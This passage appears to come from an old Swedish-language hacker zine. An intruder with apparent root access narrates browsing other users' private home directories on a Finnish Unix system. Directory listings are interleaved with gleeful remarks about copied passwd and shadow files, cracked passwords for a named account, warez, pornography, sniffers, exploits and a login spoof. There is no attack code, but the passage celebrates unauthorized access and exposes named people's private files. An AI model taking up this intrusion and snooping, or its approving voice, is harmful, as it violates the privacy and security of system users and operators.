-rw------- 1 candyman nighteam 712 Jan 11 13:24 .pine-interrupted-mail
-rw-r--r-- 1 candyman nighteam 5529 Jan 12 15:36 .pinerc
-rw-r--r-- 1 candyman nighteam 480 Jan 10 11:48 .plan
-rw-r--r-- 1 candyman nighteam 454 Dec 22 09:24 .plan~
-rw-r--r-- 1 candyman nighteam 58 Nov 15 14:55 .project
-rw-r--r-- 1 candyman nighteam 58 Nov 8 17:10 .project~
-rw-r--r-- 1 candyman nighteam 17 Sep 4 21:32 .signature
-rw-r--r-- 1 candyman nighteam 15 Oct 20 20:05 .slirprc
-rw-r--r-- 1 candyman nighteam 23 Oct 20 19:52 .slirprc~
-rw-r--r-- 1 candyman nighteam 63 Jan 12 13:19 .tcshrc
-rw-r--r-- 1 candyman nighteam 33 Jan 10 12:43 .tcshrc~
drwxr-xr-x 2 candyman nighteam 1024 Aug 25 13:49 .term
drwxr-xr-x 4 candyman nighteam 1024 Jan 12 13:32 .tin
-rw-r--r-- 1 candyman nighteam 94 Aug 18 12:35 .xinitrc
-rw-r--r-- 1 candyman nighteam 66 Aug 18 12:19 .xinitrc~
-rw-r--r-- 1 candyman nighteam 118372 Dec 19 16:33 Configure.help-1.3
drwxr-xr-x 9 candyman access 1024 Dec 14 14:29 Linux
drwx------ 2 candyman nighteam 1024 Nov 24 10:21 Mail
drwx------ 2 candyman nighteam 1024 Nov 24 10:21 News
drwx------ 3 candyman nighteam 1024 Oct 26 23:05 build
drwx------ 22 candyman nighteam 1024 Dec 14 15:44 download
drwx------ 5 candyman nighteam 1024 Dec 13 11:26 graphics
drwxr-xr-x 2 candyman nighteam 1024 Oct 12 12:33 html
-rwxr-xr-x 1 root root 8752 Jan 10 12:14 linuxfin.txt
drwx------ 2 candyman nighteam 1024 Jan 12 10:50 mail
-rw------- 1 candyman nighteam 1971 Jan 10 16:28 mbox
drwx------ 3 candyman nighteam 1024 Dec 13 12:39 netscape
drwx------ 2 candyman nighteam 2048 Oct 12 11:23 news
drwx------ 2 candyman nighteam 1024 Oct 10 13:10 para-proc
drwx------ 2 candyman nighteam 1024 Dec 7 14:54 prosa
drwx------ 2 candyman nighteam 1024 Jan 10 11:54 shadow
drwx------ 4 candyman nighteam 1024 Oct 12 11:29 source
drwxrwx--- 5 candyman access 1024 Jan 12 18:50 teddy
drwx------ 2 candyman nighteam 1024 Jan 10 10:47 tmp
Well, han hade en hel del skit.. Men i tmp kanske det finns ngt roligt..
Lat oss checka..
/private/candyman/tmp:
total 20
drwx------ 2 candyman nighteam 1024 Jan 10 10:47 .
drwxr-xr-x 24 candyman nighteam 2048 Jan 12 15:36 ..
-rw-r--r-- 1 root root 1470 Dec 15 00:25 aliases
-rwx------ 1 candyman nighteam 3617 Aug 8 17:52 evitech.fi
-rwx------ 1 candyman nighteam 250 Aug 11 11:44 guessed
-rwx------ 1 candyman nighteam 9 Aug 8 17:49 katjahmr
-rw-r--r-- 1 root root 5091 Jan 9 14:20 passwd
-r-------- 1 root root 3504 Jan 9 14:27 shadow
Hehe, joda.. Det skulle jag nog vilja saga.. Tre av filerna har han tydligen
satt upp nar han kort med root oxa.. Well, kanske ska beratta vad som
dojlde sig bakom nagra av filnamnen oxa.. Aven om de ar ratt sjalv
forklarande.. guessed inneholl nagra crackade passwd's till evitech.fi.
Det var tydligen crackat med Crack 4.1 kan jag ju oxa saga.. katjahmr
inneholl passwordet till usern katjahmr pa evitech.fi.. (Ett annat
password till samma konto fanns i guessed, sa de har antagligen bytt password
at henne..)
Ska well fortsatta, och kika lite pa vad pone kan dolja..
/private/pone:
total 5274
-rw-r--r-- 1 pone nighteam 44156 Dec 20 15:32 #sit.fi.sorted#
-rwx------ 1 pone nighteam 1399 Dec 4 09:00 %backup%~
drwxr-xr-x 24 pone nighteam 2048 Jan 12 08:45 .
drwxrwxr-x 4 root root 1024 Nov 26 20:27 ..
-rwx------ 1 pone nighteam 1246 Jan 12 08:41 .addressbook
-rw-r--r-- 1 pone nighteam 2573 Jan 12 08:41 .addressbook.lu
-rw------- 1 pone nighteam 542 Dec 20 16:45 .article
-rwx------ 1 pone nighteam 756 Dec 20 18:51 .cshrc
-rwx------ 1 pone nighteam 733 Dec 2 13:51 .cshrc~
-rw-r--r-- 1 pone nighteam 15 Dec 20 13:01 .forward
-rwx------ 1 pone nighteam 164 Jul 10 1995 .kermrc
-rwx------ 1 pone nighteam 34 Jun 6 1993 .less
-rwx------ 1 pone nighteam 114 Nov 24 1993 .lessrc
-rw-r--r-- 1 pone nighteam 6 Nov 26 20:42 .logout
-rwx------ 1 pone nighteam 25 Aug 14 03:12 .mailcap~
-rw-r--r-- 1 pone nighteam 0 Dec 20 08:53 .mc.ini
-rw-r--r-- 1 pone nighteam 70 Dec 20 08:53 .mc.tree
-rwx------ 1 pone nighteam 357 Aug 10 06:10 .netscape-bookmarks.html
drwxr-xr-x 2 pone nighteam 11264 Nov 24 19:50 .netscape-cache
-rwx------ 1 pone nighteam 91 Aug 10 06:10 .netscape-cookies
-rwx------ 1 pone nighteam 12923 Aug 14 04:13 .netscape-history
-rwx------ 1 pone nighteam 1568 Oct 23 20:22 .netscape-preferences
-rwx------ 1 pone nighteam 0 Jan 12 13:46 .news_time
-rw-r--r-- 1 pone nighteam 290356 Dec 20 19:39 .newsrc
-rw-r--r-- 1 pone nighteam 259272 Oct 15 17:02 .newsrc.20926
-rw-r--r-- 1 pone nighteam 159420 Dec 20 16:47 .oldnewsrc
drwxr-xr-x 2 pone nighteam 2048 Oct 29 20:11 .pics
-rw-r--r-- 1 pone nighteam 5657 Jan 12 08:45 .pinerc
-rw-r--r-- 1 pone nighteam 494 Aug 28 02:48 .plan
-rw-r--r-- 1 pone nighteam 12 Aug 28 02:50 .project
-rwx------ 1 pone nighteam 414 Dec 20 17:51 .signature
-rwx------ 1 pone nighteam 415 Nov 17 12:27 .signature~
drwx------ 2 pone nighteam 1024 Sep 19 09:04 .term
drwxr-xr-x 4 pone nighteam 1024 Dec 21 01:36 .tin
-rwx------ 1 pone nighteam 89 Aug 7 22:08 .xinitrc
-rw-r--r-- 1 pone nighteam 65792 Nov 16 22:44 690v100.img
drwx------ 2 pone nighteam 1024 Jul 28 13:02 Mail
drwx------ 2 pone nighteam 1024 Jul 28 13:02 News
-rw-rw-r-- 1 pone nighteam 15262 Nov 21 14:26 PPP-HOWTO.gz
-rw-r--r-- 1 pone nighteam 208339 Nov 21 19:38 alt.2600_FAQ,_Beta_.012_-_Part_1_1
-rw-r--r-- 1 pone nighteam 6133 Nov 21 19:38 alt.2600_Survival_Guide
drwxrwxr-x 2 pone nighteam 1024 Nov 16 09:33 arlan
dr-x------ 2 pone nighteam 1024 Nov 27 03:25 crontabs
-rw-r--r-- 1 pone nighteam 3877 Jan 11 18:14 cute.fi
-rw------- 1 pone bin 477 Dec 18 15:37 dead.letter
drwxr-xr-x 4 pone nighteam 1024 Nov 24 11:28 docs
drwxr-xr-x 4 pone nighteam 1024 Nov 30 20:32 download
-rwx------ 1 pone nighteam 216 Nov 6 21:09 falm
drwxr-xr-x 3 fear users 1024 Dec 11 16:02 fear
-rwx------ 1 pone nighteam 485 Nov 20 18:17 fmasi
-rwx------ 1 pone nighteam 485 Nov 20 18:16 fmasi~
-rwx------ 1 pone nighteam 238 Nov 6 21:21 fmm
-rwx------ 1 pone nighteam 437 Nov 6 21:41 fpone
-rw-r--r-- 1 pone nighteam 2076 Nov 1 20:18 homepage.html
-rw-r--r-- 1 pone nighteam 2001 Nov 1 19:57 homepage.html~
drwxr-xr-x 13 pone nighteam 1024 Dec 2 15:31 html
-rwx------ 1 pone nighteam 307 Dec 18 16:50 iafmail
-rwx------ 1 pone nighteam 312 Dec 18 16:50 iafmail~
-rw-r--r-- 1 pone nighteam 856989 Nov 23 11:49 ingres04.tar.Z
-rwx------ 1 pone nighteam 312 Nov 16 20:34 innomail
-rwx------ 1 pone nighteam 301 Nov 16 20:33 innomail~
drwxr-xr-x 3 pone nighteam 1024 Jan 12 01:57 log
-rw-r--r-- 1 pone nighteam 198 Dec 2 17:38 loggi
-rw------- 1 pone nighteam 1535 Nov 29 11:21 loki
drwxr-xr-x 2 pone nighteam 12288 Aug 25 13:30 lost+found
drwx------ 2 pone nighteam 1024 Jan 12 08:54 mail
-rwx------ 1 pone nighteam 588 Dec 2 13:43 masi
-rwx------ 1 pone nighteam 586 Nov 27 09:48 masi~
drwxr-xr-x 2 pone nighteam 1024 Dec 2 18:10 matts
-rw------- 1 pone nighteam 105106 Nov 28 17:50 mbox
drwxr-xr-x 2 root root 1024 Nov 24 11:47 mqueue
-rw------- 1 pone nighteam 1562829 Nov 24 20:38 nag.ps
-rw------- 1 pone nighteam 1562833 Nov 24 20:37 nag.ps~
drwx------ 2 pone nighteam 1024 Aug 7 01:34 news
drwxr-xr-x 7 nordman users 2048 Nov 28 14:55 nordman
-rw-r--r-- 1 pone nighteam 1620 Jan 11 18:28 otech.fi
drwx------ 2 pone nighteam 1024 Oct 15 16:51 passwd
-rwx------ 1 pone nighteam 542 Nov 28 13:09 pone
-rwx------ 1 pone nighteam 501 Nov 27 10:05 pone~
-rwx------ 1 pone nighteam 1435 Nov 27 03:05 q~
-rwxr--r-- 1 pone nighteam 1333 Nov 26 21:12 rooter
-rwxr--r-- 1 pone nighteam 1333 Nov 26 21:10 rooter~
-rwxr-xr-x 1 pone nighteam 438 Oct 27 18:40 setter
-rw-r--r-- 1 pone nighteam 44156 Dec 20 15:23 sit.fi
-rw-r--r-- 1 pone nighteam 44156 Dec 20 15:27 sit.fi.sorted
-rwx------ 1 pone nighteam 302 Jul 28 12:17 staffmail
-rwx------ 1 pone nighteam 301 Nov 15 13:54 studmail
-rwx------ 1 pone nighteam 302 Nov 15 13:54 studmail~
lrwxrwxrwx 1 pone nighteam 17 Dec 20 09:19 talk -> /usr/bin/talk.old
drwx------ 2 pone nighteam 1024 Jan 12 18:57 temp
drwx------ 4 pone nighteam 1024 Oct 15 16:53 texts
-rw-r--r-- 1 pone nighteam 811 Dec 19 14:24 trlog
Lite diverse passwd-filer fanns ju dar, blandannat.. I .pics fanns det porr..
(Onodigt att slosa utrymme i maget med en listning..) I download/win95/
fanns det en hel del w4r3z.. Hittar overhuvudtaget en hel del w4r3z och porr
lite overallt.. Sa jag hoppar direkt vad jag hittar i hacking-vag..
/private/pone/passwd:
total 5
drwx------ 2 pone nighteam 1024 Oct 15 16:51 .
drwxr-xr-x 24 pone nighteam 2048 Jan 12 08:45 ..
-rw------- 1 pone nighteam 376 Oct 15 16:12 ftp.aragorn.uio.no
-rw------- 1 pone nighteam 183 Oct 15 16:14 ftp.batnet.com
Tja, dar fanns tva passwd-filer.. Som han har varit lam nog att ta via ftp..
Bada var fake passwd's.. Well, over till /private2 da..
/private2:
total 22
drwxrwxr-x 13 root TheDudez 1024 Jan 12 12:56 .
drwxr-xr-x 20 root root 1024 Jan 10 11:37 ..
drwxrwxr-x 2 ripper TheDudez 1024 Nov 22 11:10 Linux
drwxrwx--- 4 paul TheDudez 1024 Jan 9 19:41 Stuff
drwxrwx--- 4 paul TheDudez 5120 Jan 9 13:07 Warez
drwxrwxr-x 2 kea TheDudez 1024 Dec 15 14:46 algdata
-rwxrwx--- 1 kea TheDudez 396 Nov 28 13:25 htmler
-rwxr-x--- 1 ripper TheDudez 410 Nov 28 13:16 htmler.old
drwxr-xr-x 19 kea TheDudez 2048 Jan 12 18:27 kea
drwxr-xr-x 3 paul TheDudez 1024 Nov 28 14:13 library
drwxr-xr-x 23 paul TheDudez 2048 Jan 12 12:37 paul
drwxr-xr-x 13 ripper TheDudez 1024 Dec 29 01:57 phrack
drwxr-xr-x 25 ripper TheDudez 2048 Jan 12 17:09 ripper
drwxr-xr-x 2 paul TheDudez 1024 Jan 12 12:57 santtu.dellas.ner.jag.orkar.JUH
drwxr-xr-x 10 ted TheDudez 1024 Dec 28 19:06 ted
Tja, som ni ser.. Warez igen.. I Stuff fanns bland annat en passwd-fil igen..
I Warez, inte sa ovantat warez... I kea, som verkar vara webadmin, fanns
passwd-filer och crackade konton.. I paul fanns en massa porr, en del warez
och en del passwd-filer.. Har ar vad som fanns i phrack..
/private2/phrack:
total 22
drwxr-xr-x 13 ripper TheDudez 1024 Dec 29 01:57 .
drwxrwxr-x 13 root TheDudez 1024 Jan 12 12:56 ..
-rw-r--r-- 1 ripper TheDudez 3072 Feb 14 1995 anarch.zip
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 11:49 aotd
drwxr-xr-x 2 ripper TheDudez 2048 Sep 26 11:56 ati
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 11:58 btr
drwxr-xr-x 2 ripper TheDudez 4096 Sep 26 12:20 cdc
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 12:34 dfp
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 12:35 fbi
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 12:39 informatik
drwxr-xr-x 2 ripper TheDudez 2048 Sep 26 12:52 kaos
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 12:58 lodcom
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 13:05 lol
drwxr-xr-x 2 ripper TheDudez 2048 Sep 26 13:44 misc
En hel del hp-zines har de samlat pa sig.. Och i misc, en massa blandade
hp-texter och utils.. Har ar ripper's dir..
/private2/ripper:
total 1190
drwxr-xr-x 25 ripper TheDudez 2048 Jan 12 17:09 .
drwxrwxr-x 13 root TheDudez 1024 Jan 12 12:56 ..
drwxr-xr-x 4 ripper TheDudez 3072 Nov 14 18:25 ..html
drwxr-xr-x 2 ripper TheDudez 1024 Sep 6 13:27 .LiCe
drwxr-xr-x 2 ripper TheDudez 1024 Sep 7 17:41 .a
-rw-r--r-- 1 ripper TheDudez 215 Sep 21 12:39 .addressbook
-rw-r--r-- 1 ripper TheDudez 1492 Sep 21 12:39 .addressbook.lu
-rw------- 1 ripper TheDudez 541 Dec 29 01:38 .article~
-rw-r--r-- 1 ripper TheDudez 41 Sep 21 19:55 .bash_history
-rw-r--r-- 1 ripper TheDudez 846 Nov 21 15:52 .cshrc
-rw-r--r-- 1 ripper TheDudez 846 Nov 9 20:50 .cshrc~
drwx------ 2 ripper TheDudez 1024 Jul 26 20:43 .elm
-rw-r--r-- 1 ripper TheDudez 41 Jan 11 12:53 .forward
-rw-r--r-- 1 ripper TheDudez 19 Jan 11 12:53 .forward_bara_forward
-rw-r--r-- 1 root root 41 Jan 9 14:02 .forward_old
-rw-r--r-- 1 ripper TheDudez 112 Jul 26 20:04 .ircrc
-rw-r--r-- 1 ripper TheDudez 164 Jul 10 1995 .kermrc
-rw-r--r-- 1 ripper TheDudez 34 Jun 6 1993 .less
-rw-r--r-- 1 ripper TheDudez 114 Nov 24 1993 .lessrc
-rw------- 1 ripper TheDudez 859 Jan 10 12:02 .letter~
-rw-r--r-- 1 ripper TheDudez 84 Aug 1 22:23 .login
-rw-r--r-- 1 ripper TheDudez 0 Dec 29 01:55 .mc.ini
-rw-r--r-- 1 ripper TheDudez 1328 Dec 29 01:55 .mc.tree
drwxr-xr-x 2 ripper TheDudez 1024 Dec 27 00:00 .ncftp
-rw------- 1 ripper TheDudez 0 Jan 12 17:06 .news_time
-rw-r--r-- 1 ripper TheDudez 2292 Jan 12 17:09 .newsrc
-rw-r--r-- 1 ripper TheDudez 2292 Jan 12 17:07 .oldnewsrc
-rw-r--r-- 1 ripper TheDudez 5488 Jan 12 17:06 .pinerc
-rw-r--r-- 1 ripper TheDudez 404 Sep 1 13:58 .plan
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 14:44 .procmail
-rw-r--r-- 1 ripper TheDudez 152 Sep 26 14:50 .procmailrc
-rw-r--r-- 1 ripper TheDudez 19 Aug 14 20:42 .project
-rw-r--r-- 1 ripper TheDudez 408 Jan 12 17:06 .signature
-rw-r--r-- 1 ripper TheDudez 465 Nov 9 20:48 .signature.old
-rw-r--r-- 1 ripper TheDudez 405 Aug 25 08:04 .signature~
drwx------ 2 ripper TheDudez 1024 Sep 19 08:10 .term
-rw------- 1 ripper TheDudez 639 Jul 29 06:07 .tia
drwxr-xr-x 4 ripper TheDudez 1024 Jan 12 17:09 .tin
drwxr-xr-x 12 ripper TheDudez 2048 Dec 28 21:54 Crack-4.1
-rw-r--r-- 1 ripper TheDudez 14939 Oct 30 07:18 Dip+SLiRP+CSLIP_v1.1
drwx------ 2 ripper TheDudez 1024 Sep 12 14:16 Mail
drwxr-xr-x 2 ripper TheDudez 4096 Jan 12 17:09 News
drwxr-x--- 2 ripper TheDudez 1024 Oct 31 17:29 bin
drwxr-xr-x 3 ripper TheDudez 1024 Sep 19 17:23 cipher
-rw-r--r-- 1 ripper TheDudez 770 Jan 9 13:08 crontab
-rw-r--r-- 1 ripper TheDudez 812635 Dec 26 23:55 de220e.exe
-rw-r--r-- 1 ripper TheDudez 819 Dec 28 21:45 dead.article
-rw------- 1 ripper bin 1121 Oct 21 23:16 dead.letter
drwxr-xr-x 2 ripper TheDudez 1024 Aug 14 20:56 dev
drwxr-xr-x 4 ripper TheDudez 1024 Nov 30 15:32 html
drwx------ 2 ripper TheDudez 1024 Jan 12 14:59 mail
-rw-r--r-- 1 ripper TheDudez 3003 Sep 26 19:48 mailer
drwxrwxr-x 2 ripper TheDudez 1024 Oct 26 15:53 mits
drwxr-xr-x 3 ripper TheDudez 1024 Nov 9 17:57 nc
drwxr-xr-x 2 ripper TheDudez 1024 Nov 24 21:42 net
-rw-r--r-- 1 ripper TheDudez 101455 Sep 19 19:20 net-tools-1.2.0.tar.gz
-rw-r--r-- 1 ripper TheDudez 396 Nov 9 20:47 output
-rw------- 1 ripper TheDudez 682 Sep 26 14:34 passu
-rw-r--r-- 1 ripper TheDudez 45056 Nov 6 11:37 passwd
drwxrwxr-x 2 ripper TheDudez 2048 Jan 12 11:01 pics
-rw-r--r-- 1 ripper TheDudez 95486 Sep 20 10:21 roots.net
drwxr-xr-x 3 ripper TheDudez 1024 Aug 31 19:42 screen
-rw-r--r-- 1 ripper TheDudez 8755 Sep 21 19:32 shcrack.c
-rw-r--r-- 1 ripper TheDudez 9716 Sep 21 19:37 spoof.c
-rw-r--r-- 1 ripper TheDudez 642 Sep 21 19:39 spoof.doc
drwxr-xr-x 2 ripper TheDudez 1024 Dec 7 23:46 stuff
-rw-r--r-- 1 ripper TheDudez 6155 Sep 28 16:31 sunny.sh
-rwx------ 1 ripper TheDudez 2277 Nov 9 20:49 taggit
-rw-r--r-- 1 ripper TheDudez 2002 Nov 9 20:33 tags
drwxr-xr-x 2 ripper TheDudez 1024 Dec 5 15:19 test
-rw-r--r-- 1 ripper TheDudez 21859 Nov 13 11:36 uucp.how
Well, en login-spoof, sniffers, passwd-filer, exploits, porr, cracker-prog,
crackade passwd-filer, en ratt fin samling dict-filer, krypterings-progs..
Heh, ripper skulle nastan kunna vara en av oss! :) Men.. Kanske inte precis
vad man vill ha som sysadm.. I ripper's mail fanns lite ql info oxa..
Detaljerad beskrivning och pascal-src for att gora en smartcard-lasare,
koppla in den till sin PC, och med programmet programmera om telefon-kort..
Programmet passade for kort fran Norge, Irland, Czech Republic (!?) och
Finland.. Hehe.. Well, det fanns en hel del tvivelaktiga saker pa det har
systemet..
<EOF>